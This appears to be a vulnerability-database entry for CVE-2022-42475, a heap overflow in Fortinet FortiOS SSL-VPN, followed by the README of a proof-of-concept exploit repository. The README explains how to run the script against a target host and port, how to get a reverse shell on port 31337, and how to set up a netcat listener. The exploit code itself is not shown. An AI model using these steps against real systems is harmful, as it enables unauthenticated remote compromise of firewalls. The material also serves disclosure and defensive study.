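Related vulnerability
Title:
Fortinet FortiOS buffer error vulnerability
(CVE-2022-42475)
Description: Fortinet FortiOS is a security operating system from the US company Fortinet, purpose-built for the FortiGate network security platform. It provides firewall, antivirus, IPSec/SSL VPN, web content filtering, anti-spam and other security functions. Fortinet FortiOS contains a security vulnerability: its SSL-VPN allows an unauthenticated remote attacker to trigger a heap buffer overflow with specially crafted malicious requests, leading to arbitrary code or command execution.
Introduction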
# cve-2022-42475
PoC code to exploit the heap overflow in Fortinet's SSL-VPN daemon
## Usage
**pip install pwntools**
To use this code, save it in a file, say exploit.py, and run it with Python from the command line, passing in the required arguments. Here's an example command to run the exploit:
> python exploit.py <target_host> <target_port> <reverse_ip> <command1> <command2>
Replace <target_host> with the hostname or IP address of the target system, <target_port> with the port number of the vulnerable service, and <reverse_ip> with the IP address of the machine you want to receive a shell on. The remaining arguments are the commands that you want to execute, separated by spaces.
For example, if the target system has IP address 192.168.0.100, the vulnerable service is running on port 8080, and you want to execute the ls and id commands, you would run the following command:
> python exploit.py 192.168.0.100 8080 192.168.0.101 ls id
This will create a reverse shell connection to 192.168.0.101:31337 and execute the ls and id commands on the target system. Note that you will need to have a listener running on the specified IP address and port to receive the reverse shell. You can use tools like ncat or netcat to create a listener.
File snapshot
[4.0K] /data/pocs/35ee2bde001e2ddd2590cb19feee3d87320d1546
├── [1.7K] cve-2022-42475.py
└── [1.2K] README.md
0 directories, 2 files